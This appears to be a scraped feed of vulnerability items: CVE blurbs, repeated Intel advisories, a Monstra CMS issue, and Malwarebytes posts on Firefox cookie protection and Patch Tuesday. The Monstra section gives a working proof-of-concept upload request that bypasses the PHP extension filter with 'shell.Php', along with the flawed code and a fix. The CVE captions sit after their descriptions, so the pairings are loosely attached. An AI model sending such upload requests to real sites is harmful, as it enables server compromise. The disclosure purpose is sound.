Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability.

CVE-2022-22021

Zooms On-Premise Meeting Connector MMR before version 4.8.113.20220526 fails to properly check the permissions of a Zoom meeting attendee. As a result, a threat actor in the Zooms waiting room can join the meeting without the consent of the host.

CVE-2022-28749: Security Bulletin

Observable behavioral in power management throttling for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via network access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Software Developer Guidance for Power Advisory**

**Summary: **

A potential security vulnerability in some Intel® Processors may allow information disclosure. Intel is releasing guidance to address this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-24436

Description: Observable behavioral in power management throttling for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via network access.

CVSS Base Score: 6.3 Medium

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

**Affected Products:**

All Intel® Processors are affected.

**Recommendations:**

Intel is providing Software Guidance for cryptographic implementations. Cryptographic developers may choose to follow the guidance to harden their libraries and applications against frequency throttling information disclosure.

**Acknowledgements:**

Intel would like to thank the following external users for reporting this issue.

*   Yingchen Wang (University of Texas at Austin)
*   Riccardo Paccagnella (University of Illinois Urbana-Champaign)
*   Elizabeth Tang He (University of Illinois Urbana-Champaign)
*   Hovav Shacham (University of Texas at Austin)
*   Christopher Fletcher (University of Illinois Urbana-Champaign)
*   David Kohlbrenner (University of Washington)

Intel would like to thank the following Intel employees for finding this issue internally.

*   Chen Liu
*   Nadav Shulman
*   Jim Hermerding
*   Neer Roggel
*   Ilya Alexandrovich
*   Terry Wang (former Intel employee)

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/14/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-24436: INTEL-SA-00698

Improper input validation for some Intel(R) Processors may allow an authenticated user to potentially cause a denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Processors MMIO Undefined Access Advisory**

**Summary: **

A potential security vulnerability in Memory Mapped I/O (MMIO) for some 14nm Client/Xeon E3 Intel® Processors may allow a denial of service in certain virtualized environments.

**Vulnerability Details:**

CVEID: CVE-2022-21180

Description: Improper input validation for some Intel® Processors may allow an authenticated user to potentially cause a denial of service via local access.

CVSS Base Score: 5.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

**Affected Products:**

Some 14nm Client/Xeon E3 Intel® Processors, see full list:

https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html

**Recommendations:**

Intel recommends that users of affected Intel® Processors update to the latest Virtual Machine Monitor provided by the VMM or OS provider that addresses these issues.

**Acknowledgements:**

This issue was found internally by Intel employees. Intel would like to thank Alysa Milburn, Jason Brandt, Avishai Redelman, Nir Lavi for reporting this issue.  Intel would like to thank Ke Sun, Alan Miller, Shlomi Alkalay, Robert Jones, and Ezra Caltum.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/14/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-21180: INTEL-SA-00645

Incomplete cleanup in specific special register write operations for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Processors MMIO Stale Data Advisory**

**Summary: **

Potential security vulnerabilities in Memory Mapped I/O (MMIO) for some Intel® Processors may allow information disclosure. Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-21123

Description: Incomplete cleanup of multi-core shared buffers for some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 6.1 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

CVEID: CVE-2022-21125

Description: Incomplete cleanup of microarchitectural fill buffers on some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 5.6 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2022-21127

Description: Incomplete cleanup in specific special register read operations for some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 5.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVEID: CVE-2022-21166

Description: Incomplete cleanup in specific special register write operations for some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 5.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

**Affected Products:**

Some Intel® Processors, see full list:

https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html

**Recommendations:**

Intel recommends that users of the affected Intel® Processors update to the latest version provided by the system manufacturer that addresses these issues.

Intel® SGX PSW for Windows to version 2.16.100.3 or later: 

https://registrationcenter.intel.com/en/products/download/3406/

Intel® SGX SDK for Windows to version 2.16.100.3 or later:

https://registrationcenter.intel.com/en/products/download/3407/

Intel® SGX DCAP for Windows to version 1.14.100.3 or later:

https://registrationcenter.intel.com/en/products/download/3610/

Intel® SGX PSW for Linux to version 2.17.100.3 or later:

https://01.org/intel-software-guard-extensions/downloads

Intel® SGX SDK for Linux to version 2.17.100.3 or later:

https://01.org/intel-software-guard-extensions/downloads

Intel® SGX DCAP for Linux to version 1.14.100.3 or later:

https://01.org/intel-software-guard-extensions/downloads

To address this issue, an SGX TCB recovery is planned for Q2 2022. Customers will require the software update to get successful attestation responses. For customers using the Intel Attestation Service (IAS), the IAS Development Environment (DEV) will enforce the microcode and software updates beginning June 21, 2022 and the IAS Production Environment (LIV) will enforce the updates beginning July 19, 2022.

For customers that are not using IAS, but instead are constructing their own attestation infrastructure using the Intel® SGX Provisioning Certificate Service (PCS), updated Endorsements/Reference Values (i.e., PCK Certificates and verification collateral) will be available June 28, 2022. These customers decide when to enforce the microcode and software update, as part of their Appraisal Policies.

Refer to Intel® SGX Attestation Technical Details for more information on the SGX TCB recovery process.

Further TCB Recovery Guidance for developers is available. 

**Acknowledgements:**

The following issues were found internally by Intel employees.  Intel would like to thank Ke Sun, Alan Miller, Shlomi Alkalay, Robert Jones, Ezra Caltum for reporting CVE-2022-21123, CVE-2022-21125, CVE-2022-21127, CVE-2022-21166. Jason Kilman for reporting CVE-2022-21123, CVE-2022-21127, and Scott Cape and Anthony Wojciechowski for reporting CVE-2022-21127.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/14/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-21166: INTEL-SA-00615

Local privilege vulnerability in Yandex Browser for Windows prior to 22.3.3.801 allows a local, low privileged, attacker to execute arbitary code with the SYSTEM privileges through manipulating temporary files in directory with insecure permissions during Yandex Browser update process.

Security WiFi bypass in Yandex Browser from version 15.10 to 15.12 allows remote attacker to sniff traffic in open or WEP-protected wi-fi networks despite of special security mechanism is enabled.

Yandex Protect Anti-phishing warning in Yandex Browser for desktop from version 15.12.0 to 16.2 could be used by remote attacker for brute-forcing passwords from important web-resource with special JavaScript.

Yandex Protect Anti-phishing warning in Yandex Browser for desktop from version 16.7 to 16.9 could be used by remote attacker for brute-forcing passwords from important web-resource with special JavaScript.

CSRF of synchronization form in Yandex Browser for desktop before version 16.6 could be used by remote attacker to steal saved data in browser profile.

XSS in Yandex Browser BookReader in Yandex browser for desktop for versions before 16.6. could be used by remote attacker for evaluation arbitrary javascript code.

XSS in Yandex Browser Translator in Yandex browser for desktop for versions from 15.12 to 16.2 could be used by remote attacker for evaluation arbitrary javascript code.

Yandex Browser for iOS before 16.10.0.2357 does not properly restrict processing of facetime:// URLs, which allows remote attackers to initiate facetime-call without user's approval and obtain video and audio data from a device via a crafted web site.

Yandex Browser for desktop before 17.1.1.227 does not show Protect (similar to Safebrowsing in Chromium) warnings in web-sites with special content-type, which could be used by remote attacker for prevention Protect warning on own malicious web-site.

Yandex Browser before 16.9.0 allows remote attackers to spoof the address bar via window.open.

Race condition issue in Yandex Browser for Android before 17.4.0.16 allowed a remote attacker to potentially exploit memory corruption via a crafted HTML page.

Yandex Browser installer for Desktop before 17.4.1 has a DLL Hijacking Vulnerability because an untrusted search path is used for dnsapi.dll, winmm.dll, ntmarta.dll, cryptbase.dll or profapi.dll.

Yandex Browser before 20.8.4 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite before 20.10.0 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite for Android before 21.1.0 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite for Android prior to version 21.1.0 allows remote attackers to cause a denial of service.

Kirtikumar Anandrao Ramchandani

Yandex Browser for Android prior to version 21.3.0 allows remote attackers to perform IDN homograph attack.

Kirtikumar Anandrao Ramchandani

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.5.0.826.

An elevation of privilege vulnerability exists in Yandex Browser prior to 21.9.0.390.

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.3.3.801.

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.3.3.684.

CVE-2022-28226: Яндекс Охота в Браузере

A Stored Cross-Site Scripting (XSS) vulnerability was discovered in ProjectGeneral/edit_project_settings.php in REDCap 12.0.11. This issue allows any user with project management permissions to inject arbitrary code into the project title (app_title) field when editing an existing project. The payload is then reflected within the title tag of the page.

CVE-2022-24127: REDCap Change Log - Eastern Virginia Medical School (EVMS), Norfolk, Hampton Roads

Monstra 3.0.4 does not filter the case of php, which leads to an unrestricted file upload vulnerability.

**Brief of this vulnerability**

The Monstra 3.0.4 source code does not filter the case of php, which leads to an unrestricted file upload vulnerability.

**Test Environment**

    Apache/2.4.41 (Ubuntu20.04)
    PHP 7.4.3
    

**Affect version****POC**

    POST /monstra/admin/index.php?id=filesmanager&path=uploads/ HTTP/1.1
    Host: localhost:80
    Content-Length: 442
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost:65003
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD6KF8q8SlXAspgP7
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:65003/monstra/admin/index.php?id=filesmanager&path=uploads/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=nlofifites91aq2tsi1s520298
    Connection: close
    
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="csrf"
    
    8ff9a93b1f09f4dfa18e06c201b7355e602ea9ce
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="file"; filename="shell.Php"
    Content-Type: text/plain
    
    <?php echo "This is a test";?>
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="upload_file"
    
    上传
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7--
    

  
Execute successfully  

**Reason of This Vulnerability**

$_FILES['file']['name'] in the Upload file module does not check whether the file extension is case,Vulnerability file：/plugins/box/filesmanager/filesmanager.admin.php

            // Upload file
            // -------------------------------------
            if (Request::post('upload_file')) {
    
                if (Security::check(Request::post('csrf'))) {
    
                    $error = false;
                    if ($_FILES['file']) {
                        if ( ! in_array(File::ext($_FILES['file']['name']), $forbidden_types)) {
                            $filepath = $files_path.Security::safeName(basename($_FILES['file']['name'], File::ext($_FILES['file']['name'])), null, false).'.'.File::ext($_FILES['file']['name']);
                            $uploaded = move_uploaded_file($_FILES['file']['tmp_name'], $filepath);
                            if ($uploaded !== false && is_file($filepath)) {
                                Notification::set('success', __('File was uploaded', 'filesmanager'));
                            } else {
                                $error = 'File was not uploaded';
                            }
                        } else {
                            $error = 'Forbidden file type';
                        }
                    } else {
                        $error = 'File was not uploaded';
                    }
    
                    if ($error) {
                        Notification::set('error', __($error, 'filesmanager'));
                    }
    
                    if (Request::post('dragndrop')) {
                        Request::shutdown();
                    } else {
                        Request::redirect($site_url.'/admin/index.php?id=filesmanager&path='.$path);
                    }
                } else { die('Request was denied because it contained an invalid security token. Please refresh the page and try again.'); }
            }
    

**Repair suggestions**

Add case verification at $\_FILES\['file'\]\['name'\], as follows:

            // Upload file
            // -------------------------------------
            if (Request::post('upload_file')) {
    
                if (Security::check(Request::post('csrf'))) {
    
                    $error = false;
                    if ($_FILES['file']) {
    					$_FILES['file']['name']=strtolower($_FILES['file']['name']);  //Change uppercase to lowercase
                        if ( ! in_array(File::ext($_FILES['file']['name']), $forbidden_types)) {
                            $filepath = $files_path.Security::safeName(basename($_FILES['file']['name'], File::ext($_FILES['file']['name'])), null, false).'.'.File::ext($_FILES['file']['name']);
                            $uploaded = move_uploaded_file($_FILES['file']['tmp_name'], $filepath);
                            if ($uploaded !== false && is_file($filepath)) {
                                Notification::set('success', __('File was uploaded', 'filesmanager'));
                            } else {
                                $error = 'File was not uploaded';
                            }
                        } else {
                            $error = 'Forbidden file type';
                        }
                    } else {
                        $error = 'File was not uploaded';
                    }
    
                    if ($error) {
                        Notification::set('error', __($error, 'filesmanager'));
                    }
    
                    if (Request::post('dragndrop')) {
                        Request::shutdown();
                    } else {
                        Request::redirect($site_url.'/admin/index.php?id=filesmanager&path='.$path);
                    }
                } else { die('Request was denied because it contained an invalid security token. Please refresh the page and try again.'); }
            }

CVE-2021-40940: Monstra 3.0.4 case without filtering leads to unrestricted file upload vulnerability · Issue #471 · monstra-cms/monstra

Mozilla has launched its Total Cookie Protection addition to Firefox for users worldwide. What does it do?
The post Firefox stops advertisers tracking you as you browse, calls itself the most “private and secure major browser” appeared first on Malwarebytes Labs.

Cookies are in the news as Mozilla rolls out significant privacy changes for Firefox. The idea is to dramatically lessen the risk of privacy-invading tracking across websites without your knowledge. Tracking cookies have been a hot topic in recent months, as advertisers try switching to other methods of tracking. Will this make a noticeable difference to people’s everyday browsing experience?

**What are cookies?**

Cookies are pieces of information which websites can save in your browser. Sites you visit can request your browser save cookies whenever the browser asks it for data. This can be pictures, downloads, page content, pretty much anything at all. The browser will keep the cookie and send it back to the website whenever requests are made until the cookie expires.

Expires? That’s right. Some cookies, called session cookies, expire once you close the browser. Others, persistent cookies, will remain on board until they eventually expire or you manually delete them. Humorously, some sites allow you to permanently opt-out of cookies and tracking by…asking you to accept permanent cookies which _never_ expire.

**Forget me not…but only sometimes**

But how do these cookies, session or persistent, actually work?

Browsers and websites converse in a “stateless” fashion. Every message sent is isolated from all of the other messages. There’s no link to join any of these messages up, and that’s where cookies come into play. Cookies act like a sort of bridge for many day to day tasks inside your browser. Websites send browsers cookies, known as first party cookies, tied to a unique ID the first time they converse. The browser fires the unique ID back at the website as these messages continue to be sent.

Through this, the sites you use are able to keep you logged in, remember what you’ve done, and keep the site functional for your specific needs. While sites can read their own cookies, they can’t read cookies from other websites. This is where third-party cookies come into play.

**Third party tracking: An advertiser’s dream**

A first-party cookie on a website has been placed there by the website itself. A third-party cookie is being set by someone else, like an advertiser or ad network, via code embedded into the page. That cookie is designed to essentially follow you around the internet. This is why you start one day on a website offering up deals on movies you’re interested in, and then see adverts for those films at a cheaper price on another site the day after.

Slowly but surely, ad networks build up an incredibly accurate advertising profile of you as you move from one site to another. Depending on what’s being collected, you may end up with a huge slice of identifiable data tagged to your identity without you ever even seeing it yourself. It’s just _there_, and there’s not much you can do about it.

**The cookie controversy**

Third party cookies are not particularly popular. Ad tracking generally, even less so. Numerous questions of privacy and safety exist. Something else which exists: big fines. Not so long ago, Google and Facebook received fines for $157 million and $62 million respectively. This was for making cookies easier to accept than refuse.

Elsewhere, replacements of varying effectiveness have been proposed. Apple blocks default tracking everywhere. Google plans to ditch third party cookies in Chrome by the end of next year. Brave browser is already taking action against something called bounce tracking.

With all this in mind: What is Mozilla doing?

**Hands off the cookie jar**

Users of Firefox will now find something called Total Cookie Protection ticking along in the background. Mozilla claims that this release makes Firefox:

> _The most private and secure major browser available across Windows, Mac, and Linux. Total Cookie Protection is Firefox’s strongest privacy protection to date, confining cookies to the site where they were created, thus preventing tracking companies from using these cookies to track your browsing from site to site._

Total Cookie Protection creates individual “cookie jars” for every website you browse. Trackers are no longer able to thread that analytics picture across the web. What you get up to on one site _stays_ on one site. As a result, tracking/advertising services can no longer watch from afar as you move from URL to URL. Your analytics profile is no longer quite as useful to advertisers as it once was.

Those cookies are still able to provide analytics in terms of the site they’re on. The difference is they’re no longer as invasive in terms of building a big picture of your internet activities.

This new stack of cookie jars is in addition to a number of other privacy features already up and running, including Enhanced Tracking Protection. Around since 2018, ETP blocks trackers from a maintained list. If a party is on the list, they lose the ability to use third-party cookies.

**A cookie clean up**

No matter which browser you use, an occasional cookie clean up is a good idea. Check out our post on removing cookies, which covers removal instructions for Chrome, Firefox, Edge, Opera, Safari, and several mobile browsers too.

Firefox stops advertisers tracking you as you browse, calls itself the most “private and secure major browser”

Patch Tuesday for June 2022 brought a fix for Follina and many other security vulnerabilities. Time to figure out what needs to be prioritized.
The post Update now!  Microsoft patches Follina, and many other security updates appeared first on Malwarebytes Labs.

The June 2022 Patch Tuesday may go down in history as the day that Follina got patched, but there was a host of other important updates. And not just from Microsoft. Many other software vendors follow the pattern of monthly updates set by the people in Redmond.

**Microsoft**

Microsoft released updates to deal with 60 security vulnerabilities. Undoubtedly the most prominent one is the one that goes by the name of Follina. The Edge browser received five of the patched vulnerabilities .

**Follina, or CVE-2022-30190**

A quick recap about Follina. On Monday May 30, 2022, Microsoft issued CVE-2022-30190 regarding a vulnerability in the Microsoft Support Diagnostic Tool (MSDT) in Windows. An in the wild exploit was using a feature in Word to retrieve a HTML file from a remote server, and that HTML file in turn was using MSDT to load code and execute PowerShell commands.

**CVE-2022-30136**

Another critical vulnerability is CVE-2022-30136, a bug in NFS 4.1 which could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). This vulnerability concerns a number of Windows Server products and received a CVSS score of 9.8 out of 10. Last month, Microsoft fixed a similar vulnerability (CVE-2022-26937) affecting NFS v2.0 and v3.0.

**CVE-2022-30139**

Similar is CVE-2022-30139, a Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution (RCE) vulnerability. This vulnerability is only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default value. LDAP is a software protocol for enabling anyone to locate data about organizations, individuals and other resources such as files and devices in a network. LDAP is a “lightweight” (smaller amount of code) version of Directory Access Protocol (DAP). In total, seven vulnerabilities in LDAP were found and fixed.

**CVE-2022-30163**

Noteworthy as well is CVE-2022-30163 a Windows Hyper-V Remote Code Execution vulnerability that allows an attacker to run a specially crafted application on a Hyper-V guest that could cause the Hyper-V host operating system to execute arbitrary code. Microsoft Hyper-V is a virtualization platform, which enables administrators to virtualize multiple operating systems to run off the same physical server simultaneously.

**More Microsoft news**

Microsoft has also started to phase out Internet Explorer, but more about that in a separate post.

And then there was a storm of criticism about the way Microsoft handled the SynLapse vulnerability in Azure Data Factory and Azure Synapse Pipelines. SynLapse is the name for a critical bug in Azure’s Synapse service that allowed attackers to obtain credentials to other workspaces, execute code, or leak customer credentials to data sources outside of Azure. Rather than dealing with the vulnerability in a way that closed the gap once and for all, Microsoft choose what researchers called a halfhearted way that was easily bypassed in a following attempt. Orca researchers said they were able to bypass Microsoft’s fix for the issue twice before the company put a working fix in place.

**Other vendors**

Adobe has released security updates to address vulnerabilities in multiple products.

Atlassian released a patch for the in the wild exploited Confluence RCE vulnerability.

Citrix fixed two vulnerabilities in Citrix ADM server and Citrix ADM agent.

Drupal fixed two “Moderately critical” vulnerabilities.

GitLab released versions 15.0.1, 14.10.4, and 14.9.5 for GitLab Community Edition (CE) and Enterprise Edition (EE).

Google put out updates for Android and Chrome.

SAP published security notes about some high priority vulnerabilities

Stay safe, everyone!

Tag

#chrome